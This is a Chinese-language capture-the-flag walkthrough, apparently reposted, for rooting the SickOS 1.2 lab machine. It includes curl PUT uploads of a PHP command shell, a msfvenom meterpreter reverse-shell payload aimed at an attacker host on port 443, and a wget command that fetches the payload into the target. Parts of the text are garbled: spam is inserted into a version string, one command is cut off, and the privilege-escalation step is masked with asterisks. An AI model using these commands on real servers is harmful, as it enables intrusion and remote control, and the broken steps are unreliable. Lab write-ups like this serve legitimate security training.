如何获取SickOS 1.2 Flag


这篇文章将为大家详细讲解有关如何获取SickOS 1.2 Flag ,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。实验环境如下:基本思路:Network Scanning (网络扫描 Netdiscover, Nmap)Directory brute-force (网站目录扫描 dirb)Find HTTP Options: PUT (查找HTTP选项 curl)Generate PHP Backdoor (生成php后门 Msfvenom)Upload and execute a backdoor(上传php后门)Reverse connection (Metasploit)Privilege Escalation (cron job)Import python one-liner for proper TTY shellGet Root access and capture the flag.1)Network Scanning (网络扫描 Netdiscover, Nmap)从上面扫描可以看出,主机只开放了如下服务与端口:SSH (22/tcp) – OpenSSH 5.9p1 DebianHTTP (80/tcp) – Lighttp免费云主机域名d 1.4.282)使用dirb 扫描网站目录
使用niko 扫描时发现”The X-Content-Type-Options header is not set”,再次使用curl -v -X OPTIONS http://192.168.32.169/test测试,确认可以”put”等方法来进行注入使用curl的put方法上传一个文件 curl -v -X PUT -d ‘I am a boy’ http://192.168.32.169/test/test.txt使用相同的方法可以上传一个php调用shell命令的函数curl -X PUT -d ‘测试

生成反弹shell脚本并上传msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.32.10 lport=443 -f raw > put01.php (备注:这里端口使用443目的是绕过防火墙)上传文件方法1:利用原来上传的调用系统cmd命令方法起动一个python的临时web测试服务器,提供给客户端下载内容。python -m SimpleHTTPServer443 (备注:此使用443端口绕过防火墙)并且执行:curl “http://192.168.32.169/test/cmd.php?cmd=wget%20http://192.168.32.10:443/put01.php” 以下载put01.php文件上传文件方法2: 使用curl –upload-file启动msfconsole 并设定如下相关参数,然后执行curl “http://192.168.32.169/test/put01.php”(即查执行刚上传的shell)返回msfconsole控制台,检查chkroot的漏洞,并利用此漏洞进行***测试重新进行***测试 
关于如何获取SickOS 1.2 Flag 就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

相关推荐: shall脚本-iis

servermanagercmd -i Web-WebServer Web-Mgmt-Console Web-Scripting-Tools #安装IIS默认角色与管理控制台 [system.reflection.assembly]::loadwithpart…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

Like (0)
Donate 微信扫一扫 微信扫一扫
Previous 02/06 16:34
Next 02/06 16:34